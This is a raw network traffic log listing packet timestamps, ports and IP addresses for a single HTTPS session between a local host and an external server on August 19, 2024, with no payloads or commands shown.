Aug 19, 2024 09:28:47.284503937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.284528017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.284557104 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.284584999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.286595106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.286616087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.286674023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.286696911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.287445068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.287467003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.287496090 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.287508965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.287522078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.289381981 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.289402962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.289444923 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.289460897 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.289473057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.290262938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.290286064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.290313959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.290324926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.290342093 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.290520906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.290539980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.290574074 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.290582895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.290601015 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.327564955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.327632904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.327786922 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.327786922 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.327824116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.372422934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.377343893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.377368927 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.377412081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.377453089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.377475977 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.377510071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.377531052 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.377717972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.377760887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.377789974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.377803087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.377829075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.377847910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.379355907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.379400015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.379453897 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.379478931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.379508972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.379529953 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.380301952 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.380343914 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.380381107 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.380394936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.380422115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.380460978 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.382091045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.382150888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.382174015 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.382189989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.382217884 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.382236958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.382962942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.383011103 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.383047104 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.383059978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.383090973 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.383110046 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.383173943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.383331060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.383373976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.383408070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.383420944 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.383445978 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.383466005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.419975042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.420026064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.420089960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.420109987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.420249939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.420250893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.469813108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.469876051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.469911098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.469981909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.470017910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.470042944 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.470364094 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.470407963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.470468998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.470468998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.470485926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.470526934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.471712112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.471761942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.471801996 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.471816063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.471844912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.471864939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.472728014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.472769976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.472794056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.472807884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.472835064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.472852945 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.474805117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.474853039 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.474904060 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.474922895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.474948883 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.474972010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.475548983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.475609064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.475625038 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.475640059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.475709915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.475709915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.476052046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.476114988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.476115942 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.476145983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.476172924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.476196051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.512868881 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.512917995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.512958050 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.512976885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.513005018 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.513022900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.562474966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.562510967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.562582016 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.562602997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.562628984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.562644005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.562999010 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.563016891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.563044071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.563050032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.563082933 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.563093901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.564937115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.564956903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.564996004 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.565002918 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.565036058 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.565244913 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.565260887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.565291882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.565298080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.565311909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.565331936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.567262888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.567287922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.567328930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.567336082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.567361116 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.567378998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.568265915 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.568283081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.568325996 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.568332911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.568362951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.568521976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.568537951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.568603039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.568608999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.568655968 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.579446077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.607603073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.607630014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.607677937 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.607692957 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.607717037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.607734919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.659610987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.659636974 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.659688950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.659706116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.659729004 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.659748077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.659842968 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.659862041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.659907103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.659913063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.659945011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.660079002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.660096884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.660145998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.660151958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.660187006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.660315037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.660331011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.660367966 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.660372972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.660404921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.661782980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.661798954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.661830902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.661837101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.661858082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.661875010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.662735939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.662754059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.662808895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.662817955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.662857056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.663371086 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.663389921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.663450003 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.663455963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.663502932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.700700998 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.700733900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.700793028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.700828075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.700853109 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.700870037 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.730272055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.752079010 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.752108097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.752322912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.752347946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.752405882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754023075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754044056 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754096031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754111052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754144907 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754163980 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754180908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754199028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754249096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754256010 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754302025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754390955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754410982 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754440069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754446983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754472971 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754493952 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754678011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754697084 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754746914 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.754754066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.754789114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.755222082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.755239010 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.755270958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.755276918 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.755304098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.755325079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.755523920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.755548954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.755578995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.755585909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.755610943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.755628109 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.795545101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.795564890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.795768976 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.795802116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.795845032 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.808882952 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.844579935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.844605923 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.844731092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.844770908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.844815969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.846575975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.846596956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.846664906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.846673965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.846715927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.847260952 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.847279072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.847317934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.847325087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.847389936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.847582102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.847616911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.847657919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.847665071 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.847716093 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.848083973 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848103046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848138094 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.848145008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848180056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.848380089 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848397017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848432064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.848438025 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848453999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.848493099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.848606110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848623037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848659992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.848665953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.848687887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.848701000 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.880908012 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.888545036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.888567924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.888679028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.888700008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.888751984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.937346935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.937375069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.937459946 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.937490940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.937541962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.939363003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.939384937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.939479113 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.939493895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.939512968 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.939533949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.939548969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.939562082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.939589024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.939618111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.939907074 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.939925909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.939975977 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.939990044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.940052032 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.940082073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.940097094 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.940151930 CEST	49759	443	192.168.2.4	185.149.100.242
